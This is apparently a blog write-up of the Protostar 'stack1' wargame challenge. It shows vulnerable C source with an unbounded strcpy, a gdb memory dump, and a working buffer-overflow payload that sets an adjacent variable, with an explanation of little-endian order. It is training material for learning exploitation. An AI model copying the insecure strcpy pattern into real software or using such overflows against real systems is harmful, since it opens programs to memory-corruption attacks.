Sunday, December 9, 2012

exploit-exercises Protostar: Stack 1

This is the write-up for stack1 challenge of Exploit-Exercises' Protostar wargame. The source code is provided as fellow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];

if(argc == 1) {
errx(1, "please specify an argument\n");
}

modified = 0;
strcpy(buffer, argv[1]);

if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
Like the previous challenge, the task is to change the value of modified
variable. But this time, we have to set it up to a certain value: 0x61626364.
When looking at the ASCII table, you will see that these values are:
0x61 => a, 0x62 => b, 0x63 => c, 0x64 => d
user@protostar:~/stack1$ gdb -q /opt/protostar/bin/stack1
Reading symbols from /opt/protostar/bin/stack1...done. 
(gdb) run `python -c "print 'A'*64+'abcd'"`
Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`
Try again, you got 0x64636261

Program exited with code 036.
One small catch is that 'abcd' will be read as 'dcba'. Why is that ? Simply
because we are directly altering data in memory and the x86 architecture is
little endian.
(gdb) break 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) run `python -c "print 'A'*64+'abcd'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`

Breakpoint 1, main (argc=2, argv=0xbffff814) at stack1/stack1.c:18
18    in stack1/stack1.c
(gdb) x/30wx $esp
0xbffff700:    0xbffff71c        0xbffff94e        0xb7fff8f8       0xb7f0186e
0xbffff710:    0xb7fd7ff4       0xb7ec6165    0xbffff728        0x41414141
0xbffff720:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff730:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff740:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff750:    0x41414141    0x41414141    0x41414141    0x64636261
0xbffff760:    0x08048400    0x00000000    0xbffff7e8        0xb7eadc76
0xbffff770:    0x00000002    0xbffff814 
With that said, in order to exploit this challenge, we use the value 'dcba' in our payload.
user@protostar:~$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'dcba'"`
you have correctly got the variable to the right value

No comments:

Post a Comment